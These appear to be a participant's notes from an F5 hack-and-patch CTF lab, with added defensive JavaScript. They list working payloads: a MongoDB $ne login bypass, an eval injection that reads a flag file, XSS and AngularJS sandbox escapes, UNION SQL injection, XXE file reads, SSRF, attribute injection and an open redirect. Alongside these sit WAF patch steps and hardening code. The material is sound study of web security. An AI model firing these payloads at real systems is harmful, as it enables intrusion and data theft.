- Hack and Patch
- Warm-up :
- 1. Hack : F5CTF{9120de7f620ac2bbfff8273918732a2}
- 2. Patch : F5CTF{8547f194fb98448a89e058e2a1f9d5a1}
- Node.js & MongoDB :
- 1. Hack MongoDB injection :
- a. Intercept the login in Burp with username flag and password flag
- b. It is a Node.js framework, so the body is JSON
- i. {"username" : "flag" , "password" : "flag"}
- c. Bypass authentication
- i. JSON form : {"username" : "flag" , "password" : {"$ne": "flag"}}
- ii. HTTP regular form : username=flag&password[$ne]=flag
- 2. Patch MongoDB injection :
- a. On ASM, enable all signatures.
- b. Check the SQLINJ - NoSQL [$ne] signature
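Added example, not code from the lab: the Node.js login pattern that lets {"password": {"$ne": "flag"}} reach the driver as an operator, beside a hardened builder and a generic operator-key check. The body objects are constructed stand-ins for the parsed request body.

```javascript
// Vulnerable pattern: whatever JSON (or qs-parsed form) the client sent becomes
// the query, so password: { $ne: 'flag' } turns into a "not equal" operator.
function buildLoginQueryVulnerable(body) {
  return { username: body.username, password: body.password };
}

// Hardened: credentials must be plain strings. An object or array is rejected
// before it reaches the driver, so no key can ever be interpreted as an operator.
function buildLoginQuerySafe(body) {
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    throw new TypeError('username and password must be strings');
  }
  return { username, password };
}

// Defence in depth for other endpoints: walk the parsed body and flag any key
// starting with "$" at any depth. Note that qs-style parsers turn the form
// encoding password[$ne]=flag into { password: { $ne: 'flag' } }, so the same
// check covers the "HTTP regular form" variant of the bypass.
function containsMongoOperator(value) {
  if (Array.isArray(value)) return value.some(containsMongoOperator);
  if (value && typeof value === 'object') {
    return Object.keys(value).some(
      k => k.startsWith('$') || containsMongoOperator(value[k])
    );
  }
  return false;
}
```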
- 3. Hack Eval is Evil
- a. Send a tip calculation through Burp
- i. POST /api/node/calc
- ii. {"math":"(120 * 0.15 + 120) / 1"}
- iii. Console : eval((120 * 0.15 + 120) / 1) gives the same result
- iv. It is calculated on the server side, so we can use it
- b. require('fs').readFileSync("/eval/flag")) //
- i. The second ) closes the eval call, then // comments out the rest
- 4. Patch Eval is Evil
- a. JavaScript Code Injection - require(); (Parameter)
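Added example, not the lab's code: the /api/node/calc handler above evaluates the math field with eval(), which is why a require() call runs. This replacement accepts only numbers, + - * / and parentheses through a small recursive-descent parser, so the tip calculation still works but no identifier can ever execute.

```javascript
// Safe replacement for eval() on the "math" parameter (assumed handler shape).
function safeCalc(expr) {
  if (typeof expr !== 'string' || expr.length > 200) throw new Error('bad input');
  // Tokens: decimal numbers, the four operators, parentheses; any other
  // non-space character becomes a token that the grammar will reject.
  const tokens = expr.match(/\d+(?:\.\d+)?|[-+*/()]|\S/g) || [];
  let pos = 0;
  const peek = () => tokens[pos];
  const next = () => tokens[pos++];

  // expr := term (('+' | '-') term)*
  function parseExpr() {
    let value = parseTerm();
    while (peek() === '+' || peek() === '-') {
      value = next() === '+' ? value + parseTerm() : value - parseTerm();
    }
    return value;
  }
  // term := factor (('*' | '/') factor)*
  function parseTerm() {
    let value = parseFactor();
    while (peek() === '*' || peek() === '/') {
      value = next() === '*' ? value * parseFactor() : value / parseFactor();
    }
    return value;
  }
  // factor := number | '(' expr ')' | '-' factor
  function parseFactor() {
    const t = next();
    if (t === undefined) throw new Error('unexpected end of expression');
    if (t === '(') {
      const value = parseExpr();
      if (next() !== ')') throw new Error('missing )');
      return value;
    }
    if (t === '-') return -parseFactor();
    if (/^\d+(?:\.\d+)?$/.test(t)) return Number(t);
    // e.g. the "r" of require: identifiers are simply not in the grammar
    throw new Error(`unexpected token ${JSON.stringify(t)}`);
  }

  const result = parseExpr();
  if (pos !== tokens.length) throw new Error('trailing input');
  return result;
}
```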
- Websockets :
- 1. Hack Authentication bypass
- a. wss://udf_fqdn
- i. Wrong URL; go to /admin
- b. wss://udf_fqdn/admin
- i. Log out on the application side if needed to delete the cookie
- 2. Patch Authentication bypass
- a. Create a login page on ASM
- i. /login
- ii. Username / password
- iii. Expected response 302
- iv. String NOT : /login
- b. Login enforcement on /admin
- 3. Hack XSS over Websocket
- a. Login as admin on browser
- b. Make an order to test
- c. <script>alert(Pwned by Dancing Banana)</script>
- d. Refresh page if needed, re-test
- e. Inspect element – you can see the script, but it is not rendered by the browser
- f. <img src=/ onerror=alert(0xf5)>
- 4. Patch XSS over Websocket
- a. On error
- 5. Hack SQLi over websocket
- a. Driver, 5th Ave W' order by 1 -- '
- b. Should still work
- c. 5th Ave W' order by 6 -- ' still OK, so at least 6 columns
- d. 5th Ave W' order by 7 -- ' not OK, so we have 6 columns
- e. ' union select 1,2,3,4,5,6 from flag -- '
- f. ' union select 1,2,3,4,flag,6 from flag -- '
- 6. Patch SQLi over websocket
- a. Don't copy-paste; type the attack line by hand (issue with ' and -- )
- Platform-based XSS :
- 1. Hack JS Injection
- a. Change the filter value to something and check the page source
- b. Close the variable and inject the code
- i. Filter= matt"; alert(0x123) //
- ii. Filter= matt"; alert(0xf5) //
- 2. Patch JS Injection
- 3. Hack Angular.js injection
- a. Go to a fake page /matt
- b. /error?status=404&path=<123> will be escaped.
- c. /error?status=404&path={{3-1}} we should see 2 in the page
- d. /error?status=404&path={{1+1}} does not work. Why ?
- i. HTTP decodes + as a space, so it must be URL-encoded as %2b
- 4. Hack Angular.js Sandbox bypass
- a. Google "sandbox escape angularjs"
- i. https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs
- b. Check the Angular version in the attacked page's source code: v1.4.8
- c. {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(0xf5)//');}}
- 5. Patch Angular.js Sandbox bypass
- XXE & SSRF:
- 1. [Hack] XXE injection
- a. Contact form is XML – use Burp
- Original request
- <?xml version="1.0" encoding="UTF-8"?>
- <contact>
- <name>matt</name>
- <email>dier@gmail.com</email>
- <phone>0125632574</phone>
- <message>fsfgsdfgsdfgsdfgzerezrezrsdfsdfsdfsd</message>
- </contact>
- https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
- Attack request
- <?xml version="1.0" encoding="UTF-8"?>
- <!DOCTYPE foo [
- <!ELEMENT foo ANY >
- <!ENTITY xxe SYSTEM "file:///xxe/flag" >]>
- <contact>
- <name>&xxe;</name>
- <email>dier@gmail.com</email>
- <phone>0125632574</phone>
- <message>fsfgsdfgsdfgsdfgzerezrezrsdfsdfsdfsd</message>
- </contact>
- Response with Flag :
- 2. [Patch] XXE injection
- a. No idea how to retrieve the flag; no AJAX blocking page
- 3. [Hack] SSRF (GET)
- <?xml version="1.0" encoding="UTF-8"?>
- <!DOCTYPE foo [
- <!ELEMENT foo ANY >
- <!ENTITY xxe SYSTEM "http://ssrfserver/flag" >]>
- <contact>
- <name>&xxe;</name>
- <email>dier@gmail.com</email>
- <phone>0125632574</phone>
- <message>fsfgsdfgsdfgsdfgzerezrezrsdfsdfsdfsd</message>
- </contact>
- a. Tag :
- 4. [Patch] SSRF
- a. No AJAX popup but blocked
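Added example, not part of the lab notes, covering both the XXE and the SSRF requests above: each needs a DOCTYPE with an external ENTITY, and a contact form never needs a DTD, so the body can be refused before any XML parser sees it. The sample documents are constructed from the shape of the lab's contact form.

```javascript
// Constructed samples (same structure as the contact form in the notes).
const CLEAN_REQUEST = `<?xml version="1.0" encoding="UTF-8"?>
<contact><name>matt</name><email>dier@gmail.com</email>
<phone>0125632574</phone><message>hello</message></contact>`;

const XXE_REQUEST = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///xxe/flag" >]>
<contact><name>&xxe;</name><email>dier@gmail.com</email>
<phone>0125632574</phone><message>hello</message></contact>`;

// Pre-parse gate: returns whether the body may be parsed and why it was refused.
// This is the same decision a WAF signature for XXE makes, done in the app.
function inspectXml(xml) {
  const findings = [];
  // Comments may legally contain the text "<!DOCTYPE", so drop them first.
  const body = String(xml).replace(/<!--[\s\S]*?-->/g, '');
  if (/<!DOCTYPE\b/i.test(body)) findings.push('doctype');
  if (/<!ENTITY\b/i.test(body)) findings.push('entity-declaration');
  // General or parameter (%) entity with an external identifier; record the
  // URL scheme so logs show file (XXE) versus http (SSRF) attempts.
  const ext = body.match(
    /<!ENTITY\s+(?:%\s+)?\S+\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"([^"]*)"/i
  );
  if (ext) findings.push('external-entity:' + ext[1].split(':')[0].toLowerCase());
  // A reference such as &xxe; that is not one of the built-in XML entities.
  const refs = body.match(/&(?!amp;|lt;|gt;|quot;|apos;|#)[A-Za-z_][\w.-]*;/g) || [];
  if (refs.length) findings.push('custom-entity-reference');
  return { allowed: findings.length === 0, findings };
}
```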
- HTML5 Elements:
- 1. [Hack] Media Event Injection
- a. Go to Services and check the URL. We can change the width (check the source code).
- b. https://www.w3schools.com/tags/ref_eventattributes.asp
- c. The oncanplay event attribute is interesting for executing something (if the user can play the media)
- d. Add the element
- https://4997985e-a27c-4a62-a057-f51df08baea9.access.udf.f5.com/services?width=100%25 oncanplay=alert('F5')
- 2. [Patch] Media Event Injection
- a. Check the server technology and signatures
- b. Blocking page, but not able to see the flag. Issue with Tomer's JS.
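Added example, not from the lab, serving the three reflection points in these notes: the order text rendered over the websocket (XSS over Websocket), the filter value written into a JavaScript string (JS Injection), and the width value written into an unquoted attribute (Media Event Injection). Each context needs its own encoder; the render helpers are assumed stand-ins for the application's templates.

```javascript
// HTML text and quoted-attribute context.
function encodeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;'
  })[c]);
}

// Attribute context: always quote, then encode. The injected
// 100% oncanplay=alert('F5') stays inside the value instead of becoming
// a second attribute, which is what the unquoted width= allowed.
function attr(name, value) {
  return `${name}="${encodeHtml(value)}"`;
}

// JavaScript string-literal context (var filter = "<value>";). JSON.stringify
// escapes the closing quote that matt"; alert(0xf5) // relies on, and < > are
// rewritten so a </script> inside the value cannot end the block.
function jsString(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028|\u2029/g, m => '\\u' + m.charCodeAt(0).toString(16));
}

// Assumed rendering helpers, one per context.
function renderOrder(text) {
  return `<li class="order">${encodeHtml(text)}</li>`;
}
function renderFilterScript(value) {
  return `<script>var filter = ${jsString(value)};</script>`;
}
function renderVideoTag(width) {
  return `<video ${attr('width', width)} controls src="/media/demo.mp4"></video>`;
}
```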
- Open Redirect
- 1. [Hack] Server Side Redirect
- a. Click on Admin and change the URL with the redirect
- https://4997985e-a27c-4a62-a057-f51df08baea9.access.udf.f5.com/login?path=https://f5.com/labs
- b. Login as admin